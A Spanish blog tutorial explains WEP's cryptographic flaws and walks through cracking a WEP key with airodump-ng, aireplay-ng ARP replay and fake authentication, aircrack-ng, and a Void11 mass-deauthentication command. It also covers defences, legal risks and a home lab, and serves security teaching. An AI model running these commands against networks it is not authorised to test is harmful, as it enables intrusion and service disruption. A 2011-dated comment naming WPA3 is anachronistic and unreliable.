Volver al Blog

Introducción a WEP y por qué ya no es seguro proteger tu red Wi-Fi

Introducción a WEP y por qué ya no es seguro proteger tu red Wi-Fi

En mis clases de seguridad informática en la ESPE, una de las demostraciones que más impacta a los estudiantes es cuando logro romper una red WEP en menos de 5 minutos. Ver cómo una clave de 128 bits se vuelve completamente inútil frente a herramientas gratuitas disponibles en internet les quita el sueño. Y esa es exactamente la idea.

DISCLAIMER LEGAL FUNDAMENTAL: Este tutorial está dirigido exclusivamente a profesionales de seguridad, estudiantes en cursos autorizados, y administradores que auditen sus propias redes. Acceder a redes Wi-Fi ajenas sin autorización es ILEGAL en Ecuador y prácticamente todos los países del mundo. Este contenido es puramente educativo para entender vulnerabilidades y mejorar defensas. No soy responsable del mal uso de esta información.

¿Qué es WEP y por qué existe?

Wired Equivalent Privacy (WEP) fue introducido en 1997 como parte del estándar 802.11 original. La idea era simple: proporcionar un nivel de seguridad en redes inalámbricas equivalente al de las redes cableadas.

En teoría, sonaba bien. WEP usa cifrado RC4 con claves de 64 o 128 bits, lo que en papel debería ser suficiente para detener curiosos casuales. El problema no está en el algoritmo RC4 en sí mismo, sino en cómo WEP lo implementa.

En 2010, a pesar de que las vulnerabilidades de WEP son públicamente conocidas desde 2001, todavía encuentro redes domésticas y pequeñas empresas en Quito que lo usan. Es como seguir usando candados de bicicleta para proteger un banco.

Las fallas fatales de WEP

El problema del vector de inicialización (IV)

WEP usa un vector de inicialización de solo 24 bits que se combina con la clave para generar el flujo de cifrado RC4. Con solo 24 bits, hay únicamente 16.777.216 posibles IVs.

En una red activa, estos IVs se repiten constantemente. Cada vez que se reutiliza un IV con la misma clave, se genera el mismo flujo de cifrado. Un atacante puede recopilar suficientes paquetes con IVs repetidos y usar análisis estadístico para deducir la clave.

Reutilización de keystream

Cuando dos paquetes usan el mismo IV, un atacante puede XOR ambos textos cifrados para eliminar el keystream y obtener el XOR de los dos textos planos. Con suficientes paquetes y técnicas estadísticas, es posible reconstruir tanto el keystream como los datos originales.

Falta de autenticación e integridad

WEP usa un checksum CRC-32 para verificar integridad, pero CRC-32 es lineal. Esto significa que un atacante puede modificar tanto el texto cifrado como el checksum de manera que el resultado final pase la verificación de integridad sin conocer la clave.

Preparando el entorno de auditoría

BackTrack: tu laboratorio de seguridad

BackTrack es una distribución Linux específicamente diseñada para auditorías de seguridad y penetration testing. Incluye todas las herramientas necesarias para auditar redes wireless preconfiguradas y listas para usar.

Para descargar BackTrack:

  1. Ve a www.backtrack-linux.org
  2. Descarga la versión más reciente (BackTrack 4 R2 en este momento)
  3. Graba la ISO en un DVD o créala como LiveUSB
  4. Bootea desde el medio y tendrás un laboratorio completo de seguridad

La ventaja de BackTrack es que no necesitas instalar nada. Funciona completamente desde el LiveCD/USB, perfecto para auditorías sin dejar rastros en el sistema host.

Hardware necesario

Para auditar redes WEP necesitas una tarjeta wireless compatible con modo monitor e inyección de paquetes. Las más recomendadas son:

  • Atheros AR5005UX: Excelente compatibilidad con BackTrack
  • Ralink RT73: Buena opción económica
  • Prism54: Clásica para auditorías, aunque más difícil de encontrar

Evita tarjetas Broadcom y muchas Intel integradas; sus drivers propietarios no soportan modo monitor fácilmente.

Reconocimiento: identificando objetivos WEP

Usando Kismet para mapear redes

Kismet es un detector de redes wireless pasivo que funciona sin enviar paquetes:

# Iniciar Kismet
kismet

# Configurar interfaz wireless
# Kismet detectará automáticamente redes y mostrará:
# - SSID (nombre de red)
# - BSSID (MAC del access point)  
# - Tipo de cifrado (WEP/WPA/Abierta)
# - Canal
# - Intensidad de señal

Kismet es completamente pasivo, así que es indetectable por sistemas de monitoreo de red. Perfecto para reconocimiento inicial sin alertar al objetivo.

Airodump-ng para análisis detallado

Una vez identificadas redes WEP, airodump-ng proporciona información más detallada:

# Poner tarjeta en modo monitor
airmon-ng start wlan0

# Escanear redes disponibles
airodump-ng mon0

# Enfocarse en una red específica
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w captura mon0

Airodump-ng mostrará estadísticas en tiempo real: número de paquetes capturados, clientes conectados, y crucialmente para WEP, la cantidad de IVs únicos recolectados.

Captura de tráfico: recolectando IVs

Captura pasiva

El método más sigiloso es simplemente sentarse y esperar a que la red genere suficiente tráfico:

# Capturar tráfico de red específica
airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w wep_capture mon0

# Para WEP de 64 bits: necesitas ~20,000 IVs únicos
# Para WEP de 128 bits: necesitas ~40,000 IVs únicos

En redes activas esto puede tomar 15-30 minutos. En redes con poco tráfico, puede tomar horas o días.

Aceleración con inyección de paquetes

Para acelerar la captura, puedes inyectar paquetes para forzar la generación de tráfico:

# Verificar si la inyección funciona
aireplay-ng -9 -e "NombreRed" -a 00:11:22:33:44:55 mon0

# Ataque de autenticación falsa (necesario para algunos APs)
aireplay-ng -1 0 -e "NombreRed" -a 00:11:22:33:44:55 mon0

# Ataque ARP request replay (muy efectivo)
aireplay-ng -3 -b 00:11:22:33:44:55 mon0

El ataque ARP replay espera a capturar un paquete ARP legítimo, luego lo reinyecta continuamente. Cada reinyección genera una respuesta con un nuevo IV, acelerando dramáticamente la recolección.

Crackeando la clave WEP

Usando aircrack-ng

Una vez recolectados suficientes IVs, aircrack-ng puede recuperar la clave:

# Crackear WEP con IVs capturados
aircrack-ng wep_capture-01.cap

# Para redes con poco tráfico, puedes intentar con menos IVs
aircrack-ng -n 64 wep_capture-01.cap  # Para claves de 64 bits
aircrack-ng -n 128 wep_capture-01.cap # Para claves de 128 bits

Aircrack-ng usa el ataque FMS (Fluhrer, Mantin, Shamir) mejorado con técnicas PTW (Pyshkin, Tews, Weinmann). Con suficientes IVs débiles, la clave aparece en segundos.

Interpretando resultados

Cuando aircrack-ng encuentra la clave, la mostrará en formato hexadecimal. Por ejemplo:

KEY FOUND! [ 12:34:56:78:90 ] (ASCII: admin)
Decrypted correctly: 100%

La clave hexadecimal puede convertirse a ASCII si contiene caracteres imprimibles, revelando contraseñas como "admin", "12345", etc.

Casos prácticos y tiempos reales

Red doméstica típica

En una demostración reciente en clase, audité una red WEP doméstica con actividad normal (navegación web, email):

  • Tiempo de captura pasiva: 45 minutos
  • IVs recolectados: 32,000
  • Tiempo de crackeo: 12 segundos
  • Clave recuperada: "internet" (64 bits)

Red empresarial con inyección

Para una pequeña empresa con red WEP de 128 bits:

  • Tiempo con inyección ARP: 8 minutos
  • IVs recolectados: 55,000
  • Tiempo de crackeo: 3 minutos
  • Clave recuperada: "empresa2010" (128 bits)

La diferencia de tiempo es dramática. Con técnicas activas, incluso redes WEP de 128 bits caen en menos de 15 minutos total.

Herramientas alternativas

WEPCrack

Una implementación más antigua pero aún funcional del ataque FMS:

# Convertir formato airodump a WEPCrack
aircrack-ng -x capture.dump capture-01.cap

# Crackear con WEPCrack
wepcrack -w capture.dump

Void11

Para ataques de denegación de servicio contra redes WEP (útil para forzar reconexiones y generar tráfico):

# Desautenticar clientes masivamente
void11 -D -s 00:11:22:33:44:55 -d FF:FF:FF:FF:FF:FF mon0

WEPWedgie

Script automatizado que combina varias técnicas para optimizar el proceso completo.

Defensas y mitigaciones

La única defensa real: no usar WEP

No hay parches o configuraciones que hagan WEP seguro. Las vulnerabilidades son fundamentales en el protocolo. Las únicas opciones son:

  • Migrar a WPA/WPA2: Infinitamente más seguro
  • Red abierta con VPN: Si el hardware no soporta WPA
  • Filtrado MAC: Seguridad por oscuridad (fácil de bypassear pero detiene ataques casuales)

Detección de ataques WEP

Señales de que tu red WEP está siendo auditada:

  • Picos inusuales de tráfico ARP
  • Desautenticaciones masivas
  • Dispositivos desconocidos intentando autenticarse
  • Degradación del rendimiento de red

Sistemas de detección de intrusiones wireless como WIDS pueden alertar sobre actividad sospechosa.

Aspectos legales en Ecuador

En Ecuador, acceder a redes ajenas sin autorización puede constituir:

  • Violación de sistemas informáticos (Art. 190 Código Penal)
  • Interceptación ilegal de comunicaciones
  • Violación de privacidad

Las penas pueden incluir prisión de 6 meses a 3 años. No vale la pena arriesgar tu futuro por curiosidad técnica.

Configurando una red de pruebas

Para practicar legalmente, configura tu propio laboratorio:

  1. Compra un router viejo que soporte WEP
  2. Configúralo con WEP en un canal no utilizado
  3. Usa un SSID claramente identificable como tuyo ("TEST_WEP_CARLOS")
  4. Practica todas las técnicas en tu propia red

Esto te permite experimentar sin riesgos legales y entender profundamente las vulnerabilidades.

Más allá de WEP: el futuro de la seguridad wireless

WPA: mucho mejor, pero no perfecto

WPA corrige las fallas fundamentales de WEP usando TKIP (Temporal Key Integrity Protocol). Cada paquete usa una clave diferente, eliminando los ataques estadísticos que funcionan contra WEP.

Sin embargo, WPA sigue siendo vulnerable a ataques de diccionario si se usa una contraseña débil.

WPA2: el estándar actual

WPA2 usa AES en lugar de RC4, proporcionando cifrado mucho más robusto. Con contraseñas fuertes, WPA2 es prácticamente inquebrantable con tecnología actual.

Lecciones para administradores

Si administras redes wireless, las lecciones de WEP son claras:

  • Migra inmediatamente a WPA2: No hay excusas en 2010
  • Usa contraseñas complejas: Mínimo 20 caracteres aleatorios
  • Cambia contraseñas regularmente: Especialmente si sospechas compromiso
  • Considera redes enterprise: Para organizaciones, WPA2-Enterprise con autenticación RADIUS
  • Monitorea tu espectro: Detecta dispositivos no autorizados

Reflexión final

WEP representa un caso de estudio perfecto sobre cómo no diseñar protocolos de seguridad. A pesar de usar cifrado "fuerte" de 128 bits, fallas fundamentales en la implementación lo vuelven completamente inútil.

La lección importante no es solo técnica, sino filosófica: en seguridad informática, no basta con usar algoritmos conocidos. La implementación y el protocolo completo deben ser diseñados cuidadosamente, revisados por expertos, y probados extensivamente.

Para estudiantes que recién empiezan en seguridad wireless, dominar las técnicas contra WEP es fundamental. No porque vayan a encontrar muchas redes WEP en el futuro (esperemos que no), sino porque enseña principios que aplican a protocolos más modernos.

Cada vez que configuramos una red wireless, cada vez que elegimos un protocolo de seguridad, cada vez que diseñamos un sistema criptográfico, deberíamos recordar las lecciones de WEP: la seguridad no está en ocultar cómo funciona el sistema, sino en diseñarlo tan bien que incluso conociendo todos los detalles, siga siendo seguro.

C

Sobre Carlos Donoso

Full Stack Developer y AI Engineer apasionado por crear soluciones innovadoras. Me especializo en desarrollo web moderno, inteligencia artificial y automatización. Comparto conocimiento para ayudar a otros developers a crecer en su carrera.

Comentarios 3

Comparte tu opinión

0/1000 caracteres
Avatar de Daniel Romero

Daniel Romero

25/01/2011
Buena info, justo estaba pensando en lo débil q es el WEP. Recuerdo haber probado romper una red con un par de herramientas y fue demasiado fácil. Es clave actualizarse a WPA2 mínimo para estar más seguros. Gracias x el artículo, es un buen recordatorio.
Buena info, justo estaba pensando en lo débil q es el WEP. Recuerdo haber probado romper una red con un par de herramientas y fue demasiado fácil. Es clave actualizarse a WPA2 mínimo para estar más seguros. Gracias x el artículo, es un buen recordatorio.

Responder a Daniel Romero

Avatar de Fernando Mendoza

Fernando Mendoza

20/01/2011
Entiendo la intención educativa del artículo, pero creo q mostrar cómo romper redes WEP, aunque con advertencias legales, puede incentivar a algunos a usarlo incorrectamente. Es mejor centrarse en cómo protegerse y actualizarse a protocolos más seguros como WPA3.
Entiendo la intención educativa del artículo, pero creo q mostrar cómo romper redes WEP, aunque con advertencias legales, puede incentivar a algunos a usarlo incorrectamente. Es mejor centrarse en cómo protegerse y actualizarse a protocolos más seguros como WPA3.

Responder a Fernando Mendoza

Avatar de Pablo Salazar

Pablo Salazar

09/08/2010
Yo también estudié en la ESPE y recuerdo cómo nos impresionaba ver lo fácil q era romper el WEP. Es esencial estar al día con estos temas, la seguridad nunca debe tomarse a la ligera. Gracias x recordar lo importante q es actualizar nuestras redes.
Yo también estudié en la ESPE y recuerdo cómo nos impresionaba ver lo fácil q era romper el WEP. Es esencial estar al día con estos temas, la seguridad nunca debe tomarse a la ligera. Gracias x recordar lo importante q es actualizar nuestras redes.

Responder a Pablo Salazar

¡Enlace copiado al portapapeles!